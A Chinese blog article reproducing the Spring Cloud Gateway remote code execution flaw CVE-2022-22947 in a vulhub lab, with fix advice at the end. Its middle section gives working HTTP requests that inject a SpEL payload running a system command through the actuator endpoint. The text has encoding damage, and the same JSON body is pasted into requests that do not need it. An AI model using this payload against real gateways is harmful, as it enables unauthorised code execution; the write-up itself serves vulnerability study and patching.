Spring?Cloud?Gateway?遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2022-22947)的過程解析

更新時(shí)間：2022年08月24日 08:58:55 作者：毛毛的貓毛

Spring?Cloud?Gateway?是基于?Spring?Framework?和?Spring?Boot?構(gòu)建的?API?網(wǎng)關(guān)，它旨在為微服務(wù)架構(gòu)提供一種簡單、有效、統(tǒng)一的?API?路由管理方式，這篇文章主要介紹了Spring?Cloud?Gateway?遠(yuǎn)程代碼執(zhí)行漏洞（CVE-2022-22947）,需要的朋友可以參考下

1.漏洞描述

Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 構(gòu)建的 API 網(wǎng)關(guān)，它旨在為微服務(wù)架構(gòu)提供一種簡單、有效、統(tǒng)一的 API 路由管理方式。

Spring官方博客發(fā)布了一篇關(guān)于Spring Cloud Gateway的CVE報(bào)告，據(jù)公告描述，當(dāng)啟用和暴露 Gateway Actuator 端點(diǎn)時(shí)，使用 Spring Cloud Gateway 的應(yīng)用程序可受到代碼注入攻擊。攻擊者可以發(fā)送特制的惡意請(qǐng)求，從而遠(yuǎn)程執(zhí)行任意代碼。

2.影響版本

3.1.0

3.0.0至3.0.6

Spring Cloud Gateway 其他已不再更新的版本

3.漏洞環(huán)境搭建

利用docker搭建漏洞復(fù)現(xiàn)環(huán)境

git pul #更新vulhub

切換到/vulhub/spring/CVE-2022-22947目錄

拉取漏洞環(huán)境

docker-compose up -d

訪問http://192.168.42.145:8080

4.漏洞復(fù)現(xiàn)

添加包含惡意的路由

POST /actuator/gateway/routes/EchoSec HTTP/1.1
Host: 192.168.42.145:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 334

{
  "id": "EchoSec",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{"whoami"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}

刷新網(wǎng)關(guān)路由

POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.42.145:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 334

{
  "id": "EchoSec",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{"whoami"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}

命令執(zhí)行成功

GET /actuator/gateway/routes/EchoSec HTTP/1.1
Host: 192.168.42.145:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 334

{
  "id": "EchoSec",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{"whoami"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}

刪除添加的惡意路由

DELETE /actuator/gateway/routes/EchoSec HTTP/1.1
Host: 192.168.42.145:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 334

{
  "id": "EchoSec",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{"whoami"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}

5.修復(fù)方案

1）3.1.x用戶應(yīng)升級(jí)到3.1.1+；

2）3.0.x用戶應(yīng)升級(jí)到3.0.7+；

3）如果不需要Actuator功能，可以通過management.endpoint.gateway.enable：false配置將其禁用。

到此這篇關(guān)于Spring Cloud Gateway 遠(yuǎn)程代碼執(zhí)行漏洞（CVE-2022-22947）的文章就介紹到這了,更多相關(guān)Spring Cloud Gateway漏洞內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家！

您可能感興趣的文章: